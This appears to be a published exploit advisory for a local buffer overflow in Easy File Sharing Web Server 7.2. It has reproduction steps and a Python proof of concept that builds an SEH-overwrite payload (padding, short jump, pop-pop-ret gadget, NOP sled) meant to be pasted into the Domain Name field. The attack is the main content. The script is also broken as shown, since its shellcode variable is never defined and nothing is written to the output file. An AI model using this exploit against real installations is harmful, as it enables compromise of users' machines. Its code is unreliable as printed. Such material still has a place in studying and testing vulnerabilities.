Easy File Sharing Web Server 7.2 Domain Name Buffer Overflow

Author: ZwX Published: 2018-10-08 Verified: Verified



#Exploit Title: Easy File Sharing Web Server 7.2 - 'Domain Name' Buffer Overflow Exploit
#Exploit Author : ZwX
#Exploit Date: 2018-09-19
#Vendor Homepage : http://www.sharing-file.com/
#Link Software : http://www.sharing-file.com/efssetup.exe
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr
#Website: http://zwx-pentester.fr/

Technical Details & Description:
A local buffer overflow vulnerability has been discovered in the official Easy File Sharing Web Server.
The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process.
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
The vulnerability is marked as classic buffer overflow issue.

Proof of Concept (PoC):
The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction.
For security demonstration or to reproduce follow the provided information and steps below to continue.

1.Download and install Easy File Sharing Web Server
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Click User Account -> Active Directory -> Add Domain -> Domain Name (Input)"
4.Paste the contents of the file (poc.txt) into the input "Domain Name" and click "OK"
5.Now the calculator executes!


from struct import pack

buffer = "\x41" * 4059
a = "\xeb\x06\x90\x90"
b = pack("<I",0x1001b8c0) #0x1001b8c0 : pop esi # pop ebp # ret
nops = "\x90" * 20

poc = buffer + a + b + nops + calc
file = open("poc.txt","w")

print "POC Created by ZwX"